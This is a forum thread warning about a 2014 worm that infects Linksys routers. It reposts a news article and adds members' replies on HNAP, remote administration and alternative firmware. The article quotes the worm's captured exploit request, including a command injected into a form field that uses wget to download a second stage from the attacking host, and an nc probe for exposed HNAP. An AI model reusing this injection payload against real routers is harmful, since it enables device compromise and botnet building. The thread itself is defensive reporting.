topbanner_forum
  *

avatar image

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Monday December 9, 2024, 7:23 am
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Author Topic: WARNING! Linksys routers infected with self-replicating worm/malware.  (Read 17004 times)

IainB

  • Supporting Member
  • Joined in 2008
  • **
  • Posts: 7,544
  • @Slartibartfarst
    • View Profile
    • Read more about this member.
    • Donate to Member
This could affect a lot of unsuspecting Linksys router users. (I used to use a Linksys WRT120N, which apparently could be a potential target for this worm.)

(ArsTchnica post copied below sans embedded hyperlinks/images.)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC

Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:

echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080

Devices that return the XML HNAP output may be vulnerable.

The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.

So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.

Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.

The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.

So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:

    The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1

Further Reading
Guerilla researcher created epic botnet to scan billions of IP addresses

With 9TB of data, survey is one of the most exhaustive—and illicit—ever done.
Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)

The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.

As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.

Article updated throughout to add newly available information.

Stoic Joker

  • Honorary Member
  • Joined in 2008
  • **
  • Posts: 6,649
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #1 on: February 14, 2014, 07:08 AM »
Okay... I've only gotten as far as reading the above, but with an exploit that uses an HTTP request to port 8080 as an entry point I can only assume they're targeting the external access remote administration "feature" of the router. A feature that should be either turned off, or highly restricted to start with me thinks.

So is this exploit somehow bypassing configuration imposed restrictions, or is it just targeting the defaults crowd? I'm inclined to think simply turning off remote administration - like it's really used that often by home users - would sufficiently mitigate this but don't want to assume that just yet.



Edit: Looks like SANS confirmed the Remote Administration off = safe hypothesis.
« Last Edit: February 14, 2014, 07:43 AM by Stoic Joker »

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,859
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #2 on: February 14, 2014, 09:22 AM »
Sad part is it all comes down to HNAP. And the problems surrounding it go back at least three years. Good old Cisco. We get people to stop trusting UPnP and they throw in this piece of junk as a replacement. Nice of them to do something to reduce their consumer tech support calls by making things significantly less secure in order to do so.

Good article about that here.  :-\

IainB

  • Supporting Member
  • Joined in 2008
  • **
  • Posts: 7,544
  • @Slartibartfarst
    • View Profile
    • Read more about this member.
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #3 on: February 14, 2014, 06:13 PM »
^^ +1 for what 40hz said.    :up:
Good link to the HNAP "Easy NOT EQUALS Secure" article.
So, why, one wonders, did UpNp get excommunicated and HNAP get invited in...?    :tellme:

Some people (not me, you understand) might say that maybe the NSA couldn't hack into peoples' routers easily enough using UpNp , so they and Cisco invented HNAP to do it, but I couldn't possibly comment.

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,859
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #4 on: February 14, 2014, 09:13 PM »
^There are those who would say (but you know the sort of things THEY say) that the NSA is behind it all.

In this case, I think it really is Cisco just trying to make their life easy when it comes to products sold to a largely unsophisticated consumer demographic. Sort of like addressing a complaint that your password requirements are too stringent by switching to a 3-digit PIN scheme. If the NSA, or any of the other tri-letter pantheon benefited from any of this, I think it was purely serendipitous for them. Not that they'd complain.

HNAP made it in because Cisco implied that it was far more secure than it actually was to the people most likely to buy it. They were a little more forthright in their whitepaper. (But what average home user is ever going to read let alone understand that?) And you still needed to read between the lines to see their semi-acknowledgement it was dangerously dumbed down when it came to security.

So it goes... :-\

IainB

  • Supporting Member
  • Joined in 2008
  • **
  • Posts: 7,544
  • @Slartibartfarst
    • View Profile
    • Read more about this member.
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #5 on: February 15, 2014, 01:38 AM »
^ Yes, you're probably right - some kind of incompetence - but deliberately misleading too. Talking of which, I mentioned above that I had used the Linksys WRT120N. I had thought, from the box, that it would have been capable of up to 150Mbps. Not so, as this interesting and detailed technical analysis by smallnetbuilder.com explained: Not-So-Brilliant Disguise: Linksys By Cisco WRT120N Wireless-N Home Router Reviewed

The analysis is well worth a read.
Conclusion:
In case you missed it, Cisco didn't directly answer the question regarding expected speeds. But if you read carefully, you'll see that they are saying that the WRT120N is only certified to be interoperable at 802.11g speeds, i.e. 54 Mbps maximum link rate, even with Wi-Fi Certified Draft 11n devices.
On that basis alone, I just can't recommend the not-certified-for-draft-802.11n WRT120N, no matter how Cisco tries to disguise it.

So, Linksys/Cisco apparently deliberately sold a product that was known to be inferior to the deliberately implied superiority, and used technical obfuscation to conceal that fact and thus deliberately mislead the consumer.
How d'you like them apples?    :tellme:

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,859
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #6 on: February 15, 2014, 07:16 AM »
So, Linksys/Cisco apparently deliberately sold a product that was known to be inferior to the deliberately implied superiority, and used technical obfuscation to conceal that fact and thus deliberately mislead the consumer.

How d'you like them apples? :tellme

I didn't. And haven't for some time. So I eventually made my own. ;D

My network - my way!

mynetwork.png

There's plenty of info up on the web on how to build a router inexpensively using FOSS or freebie software. You can get a small low-power mini PC to run it on - or repurpose some 'closet queen' you have lying around waiting to be brought in for recycling (when you get around to it.) The Home Server Show published an article a while back that can get the techno-creative juices flowing... ;)

« Last Edit: February 15, 2014, 05:11 PM by 40hz »

Stoic Joker

  • Honorary Member
  • Joined in 2008
  • **
  • Posts: 6,649
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #7 on: February 15, 2014, 08:29 AM »
So, why, one wonders, did UpNp get excommunicated and HNAP get invited in...?

UPnP is to allow misc. services to get out. HNAP is to let misc. "Admins" get in. But skipping past the whole opposite directional intent bit. UPnP got much more (sales pitching to customers) exposure. Where HNAP was never really used much, because:
 1. admitting the thing could break isn't a sales highpoint.
 2. Getting the customer to enable UPnP (assuming it wasn't already by default) was the easiest route out for support people.
 3. The only time support would really need to get into a (residential...) customer's router...was when they were stuck offline...making the point of the protocol rather moot.

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,859
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #8 on: February 15, 2014, 08:37 AM »
^^ Yeah. It gets really funny when you have a router you're completely locked out of, and the first thing the support tech wants to do is have you allow them to "remote in."

Almost as funny as only providing home router tech support via chat or e-mail.

Did somebody watch Despicable Me and find gospel or something? Sheesh! :-\

minion.jpg
« Last Edit: February 16, 2014, 07:39 AM by 40hz »

IainB

  • Supporting Member
  • Joined in 2008
  • **
  • Posts: 7,544
  • @Slartibartfarst
    • View Profile
    • Read more about this member.
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #9 on: February 15, 2014, 09:02 AM »
The Home Server Show[/b][/url] published an [url=http://homeservershow.com/building-your-own-super-router-with-pfsense-and-untangle.html]article...
Thanks!

Innuendo

  • Charter Member
  • Joined in 2005
  • ***
  • default avatar
  • Posts: 2,266
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #10 on: February 15, 2014, 11:48 AM »
For those who don't have the time to re-purpose a an old PC for router duties (or the money....PCs use a lot more electricity than those little router boxes), buy a router that supports open source firmware like OpenWRT, Tomato, and DD-WRT. You'll get a lot more powerful routing options in your router's UI and generally, much more secure code that will be updated long after your router has been taken off store shelves due to it being discontinued.

Lastly, don't look for any fixes from Cisco. They recently sold off their Linksys line to Belkin. Just in case some of you aren't in the know, Belkin proudly manufactures some of the worst routers on the planet with a level of customer service & firmware support to match.

40hz

  • Supporting Member
  • Joined in 2007
  • **
  • Posts: 11,859
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #11 on: February 15, 2014, 02:36 PM »
PCs use a lot more electricity than those little router boxes)

A very real consideration.. You need to balance the hardware savings (if any) against the additional power consumption. And if you use air conditioning, the extra heat generated.

For scratch building, there's  a number of reasonably priced fanless mini-ITX motherboards that can work as excellent starting points for router/firewall projects. Some even come with dual gigabit ethernet ports, which make them ideal for network appliances and mini-servers. But that's a lot of work for most people and may require more technical knowledge than the average person has time to acquire. And it definitely won't be less expensive than repurposing a commercial home router with DD-WRT or Tomato firmware, as Innuendo suggests, even if it won't be (technically) 'as secure' or configurable as a pfSense box would be.

That said, it's very gratifying to do up an inexpensive or 'free' homebrew project that blows the doors off most commercial offerings.

tomswift.png

So ok...time for a reality check:

It all comes down to what you need, are able to afford - and have the time to learn about and mess with. I'm in the 'biz' so to speak. So I can more easily justify time spent acquiring technical skills and knowledge. But for people with real jobs (and lives) it doesn't always make sense to build from scratch - unless you value your personal time at less than minimum wage - and have a closet full of junk parts to play with.

At least so it seems to me. 8)

« Last Edit: February 15, 2014, 02:42 PM by 40hz »

Innuendo

  • Charter Member
  • Joined in 2005
  • ***
  • default avatar
  • Posts: 2,266
    • View Profile
    • Donate to Member
Re: WARNING! Linksys routers infected with self-replicating worm/malware.
« Reply #12 on: February 15, 2014, 11:41 PM »
40hz, well said. Some people just want something they can plug in that has no moving parts that will work quietly for years with no attention needed.

Others of us just love to build something from nothing just to see what we can accomplish.